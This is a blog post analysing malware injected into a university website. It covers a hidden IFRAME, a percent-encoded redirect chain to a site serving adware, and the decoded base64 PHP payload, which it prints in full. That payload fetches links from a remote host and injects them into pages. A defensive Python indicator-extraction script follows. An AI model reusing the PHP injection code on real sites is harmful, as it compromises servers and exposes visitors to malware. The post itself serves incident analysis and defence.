Another way to check whether the site is serving malicious pages or malware is to type "nagarjunauniversity" into the Google search box and open the first link.
Google's description of the pages hosted by www.nagarjunauniversity.ac.in is:
Real-time view of malicious pages and analysis
Visiting the site greets you with script execution; see the diagram below.
Viewing the source of this page will make you think for a while: why are Chinese and Russian links present in the page? Have a glimpse of the code.
When I reported the incident on OWASP, base64-encoded code was present on this page. Don't worry, the code is still present, just on other pages. While I was writing this blog, base64-encoded content was present on the following pages, among many others:
http://www.nagarjunauniversity.ac.in/administration.asp
http://www.nagarjunauniversity.ac.in/downloads.asp
The source code of either page looks like this:
If you observe carefully, you can see a site which is partially encoded (percent-encoding):
http%3A%2F%2Fbale.ws%2Fshow.php
Google's description also mentioned the bale.ws domain.
When we open the above site, it redirects to
http://superpupermegacasino.com/
which hosts *SmartDownload.exe*.
VirusTotal reports the EXE as *Win32/CasOnline!Adware*. Further details about the binary can be found at
http://www.virustotal.com/
Decoding the base64 content with the base64_decode() call present in the malicious page gives the script below, which is passed as an argument to eval(); eval() then executes it:
<?php
// Decoded payload as found on the compromised pages. The comments describe what each
// part does; the logic is the attacker's, not the site's own code.
error_reporting(0);                 // suppress warnings that would reveal the injection
$links = new GetLinks();
echo $links->Links;                 // print the remotely supplied links into the page

class GetLinks
{
    var $host = "esli.tw";          // link-serving host the payload calls home to
    var $path = "/link.php?site=";  // the victim hostname is appended as the site= value
    var $site = "";
    var $user_agent = "";
    var $Links = "";
    var $_socket_timeout = 12;
    var $_cashe_life_time = 3600;   // refetch links once per hour
    var $_cashe_file = "cashe.txt"; // local cache of the fetched links, written beside the page

    // PHP 4-style constructor (same name as the class); PHP 8 no longer calls it.
    function GetLinks()
    {
        // Fetch fresh links if the cache is missing, older than an hour, or empty.
        if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time() - $this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {
            $this->site = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
            $this->user_agent = $_SERVER['HTTP_USER_AGENT'];   // collected but never sent
            $this->Links = $this->fetch_remote_file();
            if ($handle = fopen($this->_cashe_file, 'w')) {
                fwrite($handle, $this->Links);
                fclose($handle);
            }
        }
        else {
            $this->Links = file_get_contents($this->_cashe_file);
        }
    }

    // Plain HTTP GET to http://esli.tw/link.php?site=<victim host>; returns the response body.
    function fetch_remote_file()
    {
        $buff = '';
        $fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);
        if (!$fp) {
            return $buff;           // connection failed: nothing to inject
        } else {
            $out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
            $out .= "Host: {$this->host}\r\n";
            $out .= "Connection: Close\r\n\r\n";
            fwrite($fp, $out);
            while (!feof($fp)) {
                $buff .= fgets($fp, 128);
            }
            fclose($fp);
            $page = explode("\r\n\r\n", $buff);
            return $page[1];        // drop the response headers, keep the body
        }
    }
}
I am not sure what cashe.txt does and what are its contents!
The HTML tag responsible for the execution of scripts, malware, etc. is the IFRAME.
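To triage pages like these without ever running the payload, here is an added Python example (not from the post or the site) that finds eval(base64_decode(...)) blocks, decodes them offline, and pulls out the hostnames and percent-encoded URLs a defender would block or search logs for. The sample page and payload are constructed here from the values the post quotes; their exact layout is an assumption.

```python
import base64
import re
from urllib.parse import unquote

# Constructed sample: a stripped-down PHP payload of the kind the post decodes
# (the hostname and path are the ones in the post's decoded script).
SAMPLE_PAYLOAD = b'$host = "esli.tw"; $path = "/link.php?site="; echo $links->Links;'

# Constructed sample page: a hidden IFRAME pointing at the percent-encoded URL the
# post found, followed by an eval(base64_decode(...)) block wrapping the payload.
SAMPLE_PAGE = (
    '<iframe src="http%3A%2F%2Fbale.ws%2Fshow.php" width="0" height="0"></iframe>\n'
    '<?php eval(base64_decode("' + base64.b64encode(SAMPLE_PAYLOAD).decode() + '")); ?>'
)

EVAL_B64 = re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)\s*\)')
IFRAME_SRC = re.compile(r'<iframe[^>]*\ssrc\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)
PCT_URL = re.compile(r'https?%3A%2F%2F[A-Za-z0-9%._-]+', re.IGNORECASE)
PHP_HOST = re.compile(r'\$(?:host|path)\s*=\s*["\']([^"\']+)["\']')


def decode_eval_payloads(page):
    """Return the plaintext of every eval(base64_decode("...")) block on the page.

    The payload is decoded only, never executed; malformed base64 is skipped.
    """
    out = []
    for b64 in EVAL_B64.findall(page):
        try:
            out.append(base64.b64decode(b64, validate=True).decode("latin-1"))
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
    return out


def extract_indicators(page):
    """Collect the hosts/URLs a defender would block or hunt for in proxy logs."""
    found = set()
    for src in IFRAME_SRC.findall(page):
        found.add(unquote(src))          # iframe targets, percent-decoded
    for enc in PCT_URL.findall(page):
        found.add(unquote(enc))          # bare percent-encoded URLs in the source
    for payload in decode_eval_payloads(page):
        found.update(PHP_HOST.findall(payload))  # $host/$path set inside the payload
    return sorted(found)


if __name__ == "__main__":
    for indicator in extract_indicators(SAMPLE_PAGE):
        print(indicator)
```

Run it over saved copies of the .asp pages instead of SAMPLE_PAGE to get the indicator list for the real site.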
The next blog will most probably be a binary analysis of SmartDownload.exe. Safe surfing!!!
Brother, first you must have reported to that university that the server was hacked by Chinese and then they injected an iframe into that.... and called them to get it patched... venky.cs@live.com
I already informed them